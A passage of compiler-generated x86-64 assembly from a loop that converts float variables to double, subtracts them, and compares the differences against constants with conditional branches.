movsd LCPI1_12(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.119: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.120: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.121: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.122: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.123: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.124: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -124(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.125: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_19(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_126
jp LBB1_126
jmp LBB1_135
LBB1_126: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_127
jp LBB1_127
jmp LBB1_135
LBB1_127: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_8(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_128
jp LBB1_128
jmp LBB1_135
LBB1_128: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_12(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_129
jp LBB1_129
jmp LBB1_135
LBB1_129: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_130
jp LBB1_130
jmp LBB1_135
LBB1_130: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_131
jp LBB1_131
jmp LBB1_135
LBB1_131: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_132
jp LBB1_132
jmp LBB1_135
LBB1_132: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_133
jp LBB1_133
jmp LBB1_135
LBB1_133: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_134
jp LBB1_134
jmp LBB1_135
LBB1_134: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -124(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_135: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.136: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_17(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.137: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.138: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.139: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.140: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.141: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.142: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.143: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.144: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -140(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.145: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_146
jp LBB1_146
jmp LBB1_155
LBB1_146: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_17(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_147
jp LBB1_147
jmp LBB1_155
LBB1_147: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_148
jp LBB1_148
jmp LBB1_155
LBB1_148: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_149
jp LBB1_149
jmp LBB1_155
LBB1_149: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_150
jp LBB1_150
jmp LBB1_155
LBB1_150: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_151
jp LBB1_151
jmp LBB1_155
LBB1_151: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_152
jp LBB1_152
jmp LBB1_155
LBB1_152: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_153
jp LBB1_153
jmp LBB1_155
LBB1_153: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_154
jp LBB1_154
jmp LBB1_155
LBB1_154: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -140(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_155: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.156: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_5(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.157: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.158: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_5(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.159: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.160: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_19(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.161: ## in Loop: Header=BB1_8 Depth=1
movss -48(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.162: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.163: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.164: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -132(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.165: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_166
jp LBB1_166
jmp LBB1_175
LBB1_166: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_5(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_167
jp LBB1_167
jmp LBB1_175
LBB1_167: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_168
jp LBB1_168
jmp LBB1_175
LBB1_168: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_5(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_169
jp LBB1_169
jmp LBB1_175
LBB1_169: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_170
jp LBB1_170
jmp LBB1_175
LBB1_170: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_19(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_171
jp LBB1_171
jmp LBB1_175
LBB1_171: ## in Loop: Header=BB1_8 Depth=1
movss -48(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_172
jp LBB1_172
jmp LBB1_175
LBB1_172: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_173
jp LBB1_173
jmp LBB1_175
LBB1_173: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_174
jp LBB1_174
jmp LBB1_175
LBB1_174: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -132(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_175: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.176: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
